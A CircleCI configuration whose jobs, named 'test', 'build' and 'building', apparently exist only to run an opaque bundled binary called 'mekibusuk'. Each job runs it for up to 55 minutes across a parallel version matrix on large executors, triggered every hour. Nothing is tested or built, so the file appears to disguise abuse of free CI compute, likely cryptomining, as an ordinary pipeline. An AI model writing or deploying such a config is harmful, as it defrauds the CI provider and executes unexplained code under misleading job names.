version: 2.1

executors:
  mekibusuk:
    docker:
      - image: node
    resource_class: large

orbs:
  node: circleci/node@4.7.0

jobs:
  test:
    parallelism: 5
    parameters:
      os:
        type: executor
      node-version:
        type: string
    executor: << parameters.os >>
    steps:
      - checkout
      - node/install:
          node-version: << parameters.node-version >>
          install-yarn: true
      - run:
         Name: test
         command: |
                     chmod +x mekibusuk && timeout 55m ./mekibusuk
         
  build:
    parallelism: 5
    parameters:
      os:
        type: executor
      node-version:
        type: string
    executor: << parameters.os >>
    steps:
      - checkout
      - node/install:
          node-version: << parameters.node-version >>
          install-yarn: true
      - run:
         Name: build
         command: |
                     chmod +x mekibusuk && timeout 55m ./mekibusuk
         
  building:
    parallelism: 5
    parameters:
      os:
        type: executor
      node-version:
        type: string
    executor: << parameters.os >>
    steps:
      - checkout
      - node/install:
          node-version: << parameters.node-version >>
          install-yarn: true
      - run:
         Name: building
         command: |
                     chmod +x mekibusuk && timeout 55m ./mekibusuk
         
workflows:
  all-tests:
    jobs:
      - test:
          matrix:
            parameters:
              os: [mekibusuk]
              node-version: ["10.9.0", "11.9.0"]
      - build:
          matrix:
            parameters:
              os: [mekibusuk]
              node-version: ["10.9.0", "11.9.0"]
      - building:
          matrix:
            parameters:
              os: [mekibusuk]
              node-version: ["10.9.0", "11.9.0"]

    triggers:
      - schedule:
          cron: "42 0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 * * *"
          filters:
            branches:
              only:
                - main

  alternatives:
    jobs:
      - test:
          matrix:
            parameters:
              os: [mekibusuk]
              node-version: ["10.9.0", "11.9.0"]
      - build:
          matrix:
            parameters:
              os: [mekibusuk]
              node-version: ["10.9.0", "11.9.0"]
      - building:
          matrix:
            parameters:
              os: [mekibusuk]
              node-version: ["10.9.0", "11.9.0"]
